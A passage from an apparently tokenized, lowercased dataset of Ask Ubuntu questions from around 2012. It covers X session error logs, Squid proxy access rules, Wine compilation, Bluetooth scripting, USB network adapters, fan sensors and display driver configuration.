are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:3106 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed warn 2012-03-17 19:28:46 glib < unknown > :0 unable to fetch children : method `` children '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist warn 2012-03-17 19:28:46 glib < unknown > :0 unable to fetch children : method `` children '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist ( yunio:2430 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( yunio:2430 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( polkit-gnome-authentication-agent-1:1601 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( yunio:2430 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( yunio:2430 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( polkit-gnome-authentication-agent-1:1601 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( polkit-gnome-authentication-agent-1:1601 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( polkit-gnome-authentication-agent-1:1601 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， /usr/share/system-config-printer/applet.py:336 : gtkwarning : 无法在模块路径中找到主题引擎：“pixmap”， self.loop.run ( ) ( unity-window-decorator:1652 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( unity-window-decorator:1652 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( unity-window-decorator:1652 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， ( unity-window-decorator:1652 ) : gtk-warning ** : 无法在模块路径中找到主题引擎：“pixmap”， common-plugin-message : checking whether we have a device for 4 : yes common-plugin-message : checking whether we have a device for 5 : yes common-plugin-message : checking whether we have a device for 6 : yes common-plugin-message : checking whether we have a device for 7 : yes common-plugin-message : checking whether we have a device for 10 : yes common-plugin-message : checking whether we have a device for 8 : yes common-plugin-message : checking whether we have a device for 9 : yes ( gnome-settings-daemon:13791 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed [ 1331983727,000 , xklavier.c : xkl_engine_start_listen/ ] the backend does not require manual layout management - but it is provided by the application ** ( gnome-fallback-mount-helper:1584 ) : debug : consolekit session is active 0 ( gnome-fallback-mount-helper:1584 ) : gdk-warning ** : gnome-fallback-mount-helper : fatal io error 11 ( 资源暂时不可用 ) on x server :0 . ( gdu-notification-daemon:1708 ) : gdk-warning ** : gdu-notification-daemon : fatal io error 11 ( 资源暂时不可用 ) on x server :0. unity-window-decorator : fatal io error 11 ( 资源暂时不可用 ) on x server :0.0 . ( bluetooth-applet:1583 ) : gdk-warning ** : bluetooth-applet : fatal io error 11 ( 资源暂时不可用 ) on x server :0 . ( nm-applet:1596 ) : gdk-warning ** : nm-applet : fatal io error 11 ( 资源暂时不可用 ) on x server :0 . ( nautilus:3106 ) : ibus-warning ** : _connection_closed_cb : underlying giostream returned 0 bytes on an async read ( update-notifier:1821 ) : gdk-warning ** : update-notifier : fatal io error 11 ( 资源暂时不可用 ) on x server :0. applet.py : fatal io error 11 ( 资源暂时不可用 ) on x server :0 . ( nautilus:3106 ) : gdk-warning ** : nautilus : fatal io error 11 ( 资源暂时不可用 ) on x server :0 . could you help me , thanks .
114412	having trouble granting access via squid	i 'm by far no expert at this but how do i grant access to squid ? i 'm current using 2.7.stable9 . i 've read you need to add a couple of lines , an acl and http_access line . so here 's what i added and where . i highly doubt this is right since i 'm trying to connect via my laptop and firefox is yelling at me saying the proxy server is refusing connections . acl part : # example rule allowing access from your local networks . # adapt to list your ( internal ) ip networks from where browsing # should be allowed **acl all_computers scr 192.168.1.0/255.255.255.0** acl localnet src 10.0.0.0/8 # rfc1918 possible internal network acl localnet src 172.16.0.0/12 # rfc1918 possible internal network acl localnet src 192.168.0.0/16 # rfc1918 possible internal network http_access part : # example rule allowing access from your local networks . # adapt localnet in the acl section to list your ( internal ) ip networks # from where browsing should be allowed # http_access allow localnet http_access allow localhost http_access allow all_computers any suggestions on what i 'm doing wrong ?
114415	is there a gui for /etc/hosts that i can use ?	i want to be able to easily and frequently edit my hosts file from a quick gui . any one know of one that exists ? thanks !
114421	no audio on an hp dm4	i just got a new laptop , hp dm4 , and i 'm having problems getting the audio to work properly on it . http : //www.alsa-project.org/db/ ? f=7b697a35465a9f7236fb94deb9ff97fa65e55489 i tried to edit /etc/modprobe.d/alsa-base.conf and added : option snd-hda-intel model=ref this caused the audio to work , but it 's muffled . i 'm wondering if anybody knows what would be the correct options to get this pos to work .
114425	how do i install the latest clamav & clamtk ?	i am using ubuntu 11.10 . i had installed clamav & clamtk , but it failed to update itself to the latest version so i uninstalled it . now i want to install the latest version of clamav & clamtk .
114427	where can i find more documentation on building an ubuntu-based cloud infrastructure ?	i 've been reading : https : //help.ubuntu.com/community/ubuntucloudinfrastructure it 's fascinating stuff , but documentation seems a bit sparse . where i work , we have this aging , clunky vmware esxi setup for all our internal servers . i 'd really like to read up on possible migration or just information on orchestra , integration with juju , etc that is n't a bunch of loosely connected blog posts . : p this is concerning 11.10 and , presumably , 12.04 . to make this less vague , specifically documentation on : orchestra - features , comparisons , videos , etc integrating juju with orchestra - i 'm familiar with using juju for deploying on aws , but that wiki page glances over connecting it to orchestra building a private cloud - advantages , using/deploying openstack , etc working with internal networks - configuring dmzs , setting rules , etc any recommended books would be appreciated too . i did n't intend for this to be a 'do all my homework for me ! lmgtfy ' post , i 'm just hungry for information and have n't found a good repository of knowledge for much of this .
114429	default save directory for gnome-screenshot ?	are there any sort of configuration options for specifying the default save location for gnome-screenshot , or is this hard-coded into the source code ? it used to be ~/desktop , which seems to have changed to ~/pictures ( in 12.04 ) . the only possible solution i 've seen is about setting the default name ( as it includes time stamp information now instead of simply screenshot # ) , but that solution does n't really seem ideal to me . also , this post suggested that the last save location is remembered the next time you take a screenshot , but in my experience , this does n't seem to be the case . and in any case , following on from that , that entry in gconf-editor does n't even seem to accurately reflect the last location , so more than likely an entry related to an older version of gnome-screenshot .
114434	python pybluez loses bluetooth connection after a while	i am using python to write a simple serial bluetooth script that sends information about my computer stats periodically . the receiving device is a sparkfun bluesmirf silver . the problem is that , after the script runs for a few minutes , it stops sending packets to the receiver and fails with the error : ( 11 , 'resource temporarily unavailable ' ) noticing that this inevitably happens , i added some code to automatically try to reopen the connection . however , then i get : could not connect : ( 16 , 'device or resource busy ' ) am i doing something wrong with the connection ? do i need to occasionally reopen the socket ? i 'm not sure how to recover from this type of error . i understand that sometimes the port will be busy and a write operation is deferred to avoid blocking other processes , but i would n't expect the connection to fail so regularly . any thoughts ? here is the script : import psutil import serial import string import time import bluetooth sampletime = 1 numsamples = 5 lasttemp = 0 temp_char = 't' usage_char = 'u' sensor_name = 'tc0d' filename = '/sys/bus/platform/devices/applesmc.768/temp2_input' def parsesensorsoutputlinux ( output ) : return int ( round ( float ( output ) / 1000 ) ) def connect ( ) : while ( true ) : try : gaugesocket = bluetooth.bluetoothsocket ( bluetooth.rfcomm ) gaugesocket.connect ( ( '00:06:66:42:22:96 ' , 1 ) ) break ; except bluetooth.btcommon.bluetootherror as error : print `` could not connect : `` , error , `` ; retrying in 5s ... '' time.sleep ( 5 ) return gaugesocket ; gaugesocket = connect ( ) while ( 1 ) : usage = psutil.cpu_percent ( interval=sampletime ) sensorfile = open ( filename ) temp = parsesensorsoutputlinux ( sensorfile.read ( ) ) try : gaugesocket.send ( usage_char ) gaugesocket.send ( chr ( int ( usage ) ) ) # print ( `` wrote usage : `` + str ( int ( usage ) ) ) gaugesocket.send ( temp_char ) gaugesocket.send ( chr ( temp ) ) # print ( `` wrote temp : `` + str ( temp ) ) except bluetooth.btcommon.bluetootherror as error : print `` caught bluetootherror : `` , error time.sleep ( 5 ) gaugesocket = connect ( ) pass gaugesocket.close ( ) edit : i should add that this code connects fine after i power-cycle the receiver and start the script . however , it fails after the first exception until i restart the receiver . p.s . this is related to my recent question , why is /dev/rfcomm0 giving pyserial problems ? , but that was more about pyserial specifically with rfcomm0 . here i am asking about general rfcomm etiquette .
114436	how can i change my cursor behavior ?	when i am typing , my mouse cursor , if left on the text , will eventually auto-click in whatever space in the the text box i happen to be , causing me to type in the middle of a sentence . also , the cursor in the text box will frequently stop mid-word and the screen will scroll down all of a sudden when pressing the space bar while typing . my question is , how do i change this behavior because it is driving me absolutely bat crap crazy . i have an acer aspire one d257 netbook . i am not sure if it 's a xubuntu problem because it does this while i am using windows 7 too . any help would be nice , thanks !
114437	do you really think our office computer will be screen touchable in years ?	i ca n't work without my keyboard , 'cuz m a programer . input source code by poke the cold hardy screen broke my fingers . i 'm wondering why windows 8 and ubuntu unity developer thought people will use a desktop with touch screen ! it 's ridiculousďź touch screen is just used for fun ! ok ? we do n't want bring up a mouse when we want watching tbbt on bus seat way home .
114441	error when using `` ubuntu-vm-builder '' command to create ubuntu11.10 guest on ubuntu11.10 host	i want to create guest os ( ubuntu11.10 ) on host ( ubuntu11.10 ) with `` ubuntu-vm-builder '' command . some error is occured do you know how to diagnose to this case ? please give me a piece of advice . my log is following https : //gist.github.com/1670826 i worked with following article : https : //help.ubuntu.com/community/kvm/createguests
114445	does ubuntu work on an acer travelmate 5742z ?	i have an acer travelmate 5742z , and i would like to install ubuntu on it . could someone please explain the following : where are the drivers for my computer ( acer travelmate 5742z ) ? and if they do n't exist , is it still possible to install ubuntu without these drivers and still be able to connect to the internet , use my mousepad , webcam , etc . thank you very much
114448	how can i download all my files and folders in one go when using the ubuntu one files app for android ?	i just installed ubuntu one on my android phone . i want to download all the content of my ubuntu one folder in one go . looks to me like the only way it is to go one by one file and folder clicking to download . i understand this is to help users with small storage space and/or 3g connections . but i am connecting via wifi and i have a 16g card so this is not an issue for me . is there a way to force to download all in one go ?
114452	how do you reposition and move x windows across 2 different computers ?	i 've heard of a feature of x allowing users to move windows over different x servers over the network . how do i do this in ubuntu ?
114455	what 's this strange message that 's flooding .xsession-errors ?	i have been noticing some instability with my system recently- unexplained freezes , and an occasional inability to suspend : see bug report here i have been rummaging around the logs , and i see that the following message is flooding my .xsession-errors file . ( nautilus:2076 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed the message seems to be more-or-less continuously generated , not just when i fail to suspend or have another problem . any clues what the problem is here ? thanks in advance ! charlie
114459	what is exactly juju ?	i am a sys-admin and i heard about juju from canonical . what is it and what could be his utility for someone like me ?
114460	how to install lfreetype using wine ?	i am using ubuntu 11.10 64bit and trying to install wine 1.5 , using this method : install wine on ubuntu : sudo apt-get install libfreetype6-dev gobject* libxrender-dev libfontconfig-dev pthread* libpthread-stubs0-dev xext* libsm-dev and copy the following commands in the terminal : wget http : //prdownloads.sourceforge.net/wine/wine-1.5.0.tar.bz2 tar -xjvf wine-1.5.0.tar.bz2 cd wine-1.5.0 install some packages : sudo apt-get install flex bison qt3-dev-tools qt4-qmake ./configure cd tools ./wineinstall all goes well , but at the end , i get this error message : checking for -lfreetype ... not found configure : error : freetype 32-bit development files not found . fonts will not be built . use the -- without-freetype option if you really want this . does anyone know how to install lfreetype ?
114465	how can i show thunderbird lightning tasks and events in the gnome clock applet ?	we used to have this functionality with evolution : clicking on the date-time in the gnome panel would show a list of events/tasks/appointments from the evolution calendar . as an interesting side effect , one would receive alarm notifications even when evolution was n't running . now that thunderbird is the default email client , i 'd imagine that there is a similar functionality for lightning ( thunberbird 's calendar ) . i just ca n't find it . maybe it 's not ready ?
114468	webcam picture keeps freezing	i have a logitech quickcam communicate stx webcan that was plug and play when i bought it a few years back . i have used it a few times on skype when it seemed okay , but have been trying to use it with google+ hangouts . there i found that it would be okay at first , but then the picture would freeze . sound through the built-in microphone is fine . i wondered if it was the google plug-in , but just doing some experiments with cheese and that freezes too . i can seem to un-freeze that ( for a second or 2 ) by waving a hand in front of the camera . could something be shutting down if it does n't detect enough movement ? i 'm running kubuntu 11.10 . any suggestions on things to look at ?
114472	installing ubuntu on customer computers	so i am running a small computer repair shop and i was wondering is it legal to install ubuntu on my customer computers when they bring them for repair .
114477	unable to login following permission changes in device manager ( 11.10 + gnome )	( running gnome 3 on ubuntu 11.10 ) everything working well ( at least a couple of months ) , until recently when i changed the permissions through the device manager on the sda1 /2/ 3 drives , thinking it would save all the switching i seem to have to do between users in order to see / use files i previously copied across from an external drive . now when i boot up the ubuntu splash screen loads indefinitely , and if i go in through the grub / recover option , i 'm getting a load of negative permission messages back ( regardless of using the fsck or remount options ) either way = unusable machine ( laptop dell inspiron n5050 ) , and no way through to login . i 'm looking for : ( 1 ) a way back in so any help greatfully received ( answers need to be pretty basic as i 'm a novice ) , and ( 2 ) if i 'm to learn anything , a decent thread on setting permissions within ubuntu / gnome 3 . i 'm new to both ubuntu & linux , so please be gentle ! ! cheers
114478	how can i change the resolution of avadon : the black fortress	avadon is one of the latest humble indie bundle games but i 'm having real problems changing the resolution . it just pops up and there are no options to alter it or switch it to windowed mode from fullscreen . is there any way i can change the res ?
114482	why does ubuntu only detect one usb lan adapters at a time ?	i try to connect real switch with my computer for an exam preparation , for this purpose i need more than one lan cards , and there is only one built in lan card in my computer . so , to get more lan cards , i bought 4 usb ethernet adapters ( as i have 4 usb ports in may laptop 2 usb 2.0 ports , 2 usb 3.0 ports ) . when i plug these adapters in my computer ubuntu only detects one lan card from 2.0 usb ports , and one lan card from 3.0 ports . and sometimes detects only one usb lan from all the usb ports . actually the real problem is ubuntu shows these usb lan adapters in the `` lsusb '' , but does not list them in `` ifconfig '' . kontron ( industrial computer source / ics advent ) is my lan usb ethernet . abc @ ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hu bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hu bus 002 device 012 : id 0fe6:9700 kontron ( industrial computer source / ics advent ) bus 001 device 003 : id 138a:0018 validity sensors , inc . bus 001 device 004 : id 064e : e258 suyin corp . bus 003 device 011 : id 0fe6:9700 kontron ( industrial computer source / ics advent ) bus 002 device 013 : id 0fe6:9700 kontron ( industrial computer source / ics advent ) bus 003 device 012 : id 0fe6:9700 kontron ( industrial computer source / ics advent ) bus 002 device 005 : id 0a5c:21b4 broadcom corp. bcm2070 bluetooth 2.1 + edr -- etho is my built in lan card , while eth1 is the only usb lan card that ubuntu has detected . abc @ ubuntu : ~ $ ifconfig eth0 link encap : ethernet hwaddr 2c:27 : d7 : a5 : d2:39 inet6 addr : fe80 : :2e27 : d7ff : fea5 : d239/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:21056 errors:0 dropped:1 overruns:0 frame:0 tx packets:5669 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1407289 ( 1.4 mb ) tx bytes:372566 ( 372.5 kb ) interrupt:49 base address:0xa000 eth1 link encap : ethernet hwaddr 00 : e0:4c:53:44:58 inet6 addr : fe80 : :2e0:4cff : fe53:4458/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:9230 errors:0 dropped:0 overruns:0 frame:0 tx packets:9230 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:557648 ( 557.6 kb ) tx bytes:557648 ( 557.6 kb ) wlan0 link encap : ethernet hwaddr cc:52 : af:5e:78:05 inet addr:192.168.1.65 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ce52 : afff : fe5e:7805/64 scope : linku up broadcast running multicast mtu:1500 metric:1 rx packets:17389 errors:0 dropped:0 overruns:0 frame:0 tx packets:12231 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:22452248 ( 22.4 mb ) tx bytes:1502750 ( 1.5 mb ) if i unplug the usb lan card which ubuntu has detected , then ubuntu will detect a usb lan card from the remaining plugged adapters , and process go on untill i plug all the usb lan adapters . looking for some urgent help . thanks
114488	installed 11.10 help ! can not find chrome after install	i installed 11.10 big mistake , ca n't find anything ! chrome , i installed it , removed it because i could n't find it re-installed it , still can not find it . considering going back to 10.04
114490	fan not detected by lm-sensors	my fan is blowing hard , while my cpu temperature is 32 degrees i tried a lot of things to control my fan . changed grub file grub_cmdline_linux_default= '' quiet splash acpi_osi= pci=noacpi '' _ grub_cmdline_linux_default= '' quiet splash acpi_osi=\ '' linux\ '' '' ran sensors-detect : to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok ran sensors : acpitz-virtual-0 adapter : virtual device temp1 : +34.0°c ( crit = +90.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +34.0°c ( high = +80.0°c , crit = +90.0°c ) core 2 : +34.0°c ( high = +80.0°c , crit = +90.0°c ) ran sudo start module-init-tools and sudo start module-init-tools module-init-tools stop/waiting as you can see my fan is n't detected . running fancontrol gives me this : loading configuration from /etc/fancontrol ... error : ca n't read configuration file can you help me , please ? i can not use my laptop now in class . thanks in advance . my ubuntu 11.10 system 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 01:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd 5400 series ] 01:00.1 audio device : ati technologies inc manhattan hdmi audio [ mobility radeon hd 5000 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) edit just installed lubuntu and lm-sensors does n't have any problems to detect my both my fans .
114497	is it possible to connect two wireless headsets ( bluetooth or rf ) ?	i wonder if it is possible to have two wireless headsets connected simultaneously ? is this possible with usb headsets or with bluetooth ? the purpose is for a group chat so that the microphone input is mixed and then shared over the internet , and the incoming audio stream is sent to both headsets .
114502	worth installing jupiter on acer apire revo ?	would it be worth installing jupiter ( power and device control ) on my acer aspire revo net-top ? would it help my system any or make a difference ?
114507	gnome-shell extension compatability	i have just upgrade gnome-shell 3.0 to 3.3.9 and i was surprised . almost no gnome-shell extension are not supporting . i find few in the internet which support new gnome-shell . what do can i do to make my 3.2 extensions work in 3.4 gnome-shell ?
114516	keyboard wont allow typing charecters fast	i installed ubuntu 11.10 last day , but keyboard is annoying me . it does n't allow two same character type after each other , like `` allow '' , first 'l ' is alright but for typing second 'l ' i have to wait a sec and press again . its stupid , why they make it like this ? thanks .
114519	how can i play 60fps videos ?	i have a contour camera , which is a sports/action camera and records at 60 fps . when i load any video in ubuntu using any video player , lots of frames are lost . i tried changing codecs but nothing improved ... does ubuntu support 60 fps videos ? if so , how can i play them ?
114520	ca n't find the network connections icon in my gnome classic systray	i have 11.10 installed with gnome classic desktop . from some reason , some icons are missing from my panel , mainly the network connections icon that i have on my other machines . how can i get it back to the panel ? i followed this question , but it 's still not there . the machine is connected through a static ip address and was configured via editing the network files rather than via the guis . as a consequence , the network tab in system settings does n't show only the mac address in the wired ( unmanaged ) network , and the configure button is disabled . the network connections applet , while i updated the wired connections details there , shows the connection as never been used .
114527	how can i pre-cache image thumbnails ?	i have several frequently-updated folders that contain thousands of high resolution jpgs . the first time i browse into any of them , it takes a long time for nautilus to generate all the thumbnails . how can i automatically generate and cache them ahead of time during the night ?
114530	how large can nautilus 's thumbnail cache grow ?	nautilus 's thumbnail cache in ~/.thumbnails has grown to several hundred megabytes . do i need to be concerned about unrestricted growth of this in the long term , or is its size automatically managed somehow ?
114549	software to watch lectures	is there any software on ubuntu that is a itunes u replacement ? i hate watching the lectures online because they go to slow for ; most times i speed them up to 2x so i can get through them faster .
114550	how to uninstall gnome theme ( including the gnome classic ) ?	i installed gnome theme to be tried , but i realized that i do not need it . so i wonder how can i uninstall it .
114560	how to find out if i 'm using bluetooth 3.0 + hs	i recently bought a hama bluetooth 3.0+hs dongle . i 'm using it with my ubuntu 10.04 . ubuntu recognizes the dongle and i am able to set up bt devices . but how can i check whether it is actually using version 3.0 rather than 2.1 ?
114561	how to create a new ftp user ?	i have 10.04 32bit dedicated server . just installed 10min ago . i need to create ftp and ssh accounts . i used to use cpanel in my old server . are there any free panel ? or how can i create ftp accounts ?
114564	what to do when you do n't get answers from launchpad ?	i have question # 190306 for more than 10 days without an answer . usually , i get answers from the ubuntu experts within a couple of days . the problem that i have is persistent and annoying . where should i go ?
114566	what is swap and how large a swap partition should i create ?	i have a system with 4gb of ram and intel i5 processor . i want to know how much memory i should allocate to swap . will allocating more memory help increase the system performance . in the past i have always allocated 4gb for swap .
114568	web gl for intel hd graphics	web gl works well in firefox ( version 11.0 ) but does not in google chrome ( ver.17.0.963 ) ( error in chrome= your graphics card does n't support webgl ) specs- core i5 650 intel hd graphics 4gb ddr3 ram ( but it works well in win7 )
114569	ubuntu desktop environment change to kde	what is the best way to `` upgrade '' my ubuntu 10.10 desktop to kde 4.8 ?
114572	middle click to open a new tab/close tab in firefox & chrome	how do i enable middle mouse clicking ?
114578	what is the `` grave '' button ?	the quick help of unity ( long press on the super button ) shows that switch windows of current application can be triggered by alt+grave keyboard shortcut . what is grave ? here it is :
114579	why using alt-tab causes unity to restart ?	this have happened to me 4 times . when i use alt-tab unity resets . it does n't close any apps , but when i click an app that was already open - but minimized - i only can see the minimize/maximize/close buttons and a thin border around the window , it but nothing in it , as on the following picture : this does n't just happen to one app , but to all my opened minimized apps . i also want to ask if i should file a bug report ?
114586	i can not limit the speed of ubuntu one	i can not limit the speed of ubuntu one i use ubuntu `` natty narwhal '' 11.04 , and on the ubuntu one i can limit my upload and download bandwidth , however , these settings are not being applied . what do i do ? versão em português : eu não consigo limitar a velocidade do ubuntu one eu uso o ubuntu `` natty narwhal '' 11.04 , e no ubuntu one posso limitar a minha banda de download e upload , no entanto , essas configurações não estão sendo aplicadas . o que eu faço ?
114587	why ubuntu one pretends to sychronize files , but it does n't ?	i have my ubuntu one account configured in both ubuntu 11.10 and ios ( ipod-touch ) . the photos from the ios were successfully uploaded , but in ubuntu one , although it shows the `` syncing '' and `` synchronized '' marks over the icons , the files are not showing in the website ( one.ubuntu.com ) . in short : my files are not showing in the ubuntu one website , although the icons have the `` uploaded '' mark . any idea what can be wrong here ? obs1 : also , not sure if it 's related , the icon-marks will show only when i open the ubuntu one control panel . it shows the message `` file was uploaded '' , but there 's nothing online . obs2 : the folder i 'm trying to synchronize is 30mb size . and my connection is 8mbps .
114594	video not recognized ? ubuntu 11.10 intel corporation 2nd generation core processor family integrated graphics controller	i installed ubuntu 11.10 on a hp touchsmart 520 . at startup or during installation i have a black screen ( solved temp with nomodeset ) , i now search for a proper driver to enable the full native resolution of the display : 1920x1080 . any help or directions is greatly appreciated ! lspci -vnn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0102 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) i have read some more and have additional information : output of xrandr : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 640x480 60.0 output of x -configure : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` dbe '' load `` dri2 '' load `` record '' load `` dri '' load `` glx '' load `` extmod '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` dri '' # [ < bool > ] # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` fallbackdebug '' # [ < bool > ] # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` shadow '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # 